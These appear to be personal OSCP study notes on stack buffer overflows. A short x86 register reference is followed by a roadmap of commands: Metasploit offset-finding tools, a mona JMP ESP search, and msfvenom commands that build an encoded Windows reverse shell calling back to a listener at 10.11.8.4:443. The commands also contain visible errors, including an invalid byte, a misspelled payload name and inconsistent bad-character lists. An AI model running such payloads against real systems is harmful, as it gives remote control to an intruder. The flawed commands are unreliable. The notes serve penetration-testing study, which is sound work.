OSCP-notes

Let's try harder...

View on GitHub

Buffer Overflow

EAX	- Extended Accumulator	- 32 bits
AX	- Accumulator			- 16 bits
AL 	- Accumulator low		- 8 bits
EAX (accumulator): Arithmetical and logical instructions
EBX (base): Base pointer for memory addresses
ECX (counter): Loop, shift, and rotation counter
EDX (data): I/O port addressing, multiplication, and division
ESI (source index): Pointer addressing source in string copy operations
EDI (destination index): Pointer addressing destination in string copy operations
ESP- The Stack Pointer (top of stack)
EBP - The Base Pointer (bottom of stack)
EIP- The Instruction Pointer

Buffer overflow Protections in place

Roadmap to exploitation (stack based only)

msf-pattern_create -l 888
msf-pattern_offset -l 888 -q <EIP-hex-value>
!mona find -s "\xff\xe4" -m "libspp.dll"
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.8.4 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x88\x8a\x0d\x2S\x26\x2b\x3d"

// For multi-threaded applications, it is better to exit thread instead of process to avoid crash

msfvenom -p windows/ shett_reverse_tcp LHOST=10.11.8.4 LPORT=443 EXITFUNC=
thread -f c -e x86/shikata_ga_nai -b "\x88\x8a\x8d\x25\x26\x2b\x3d"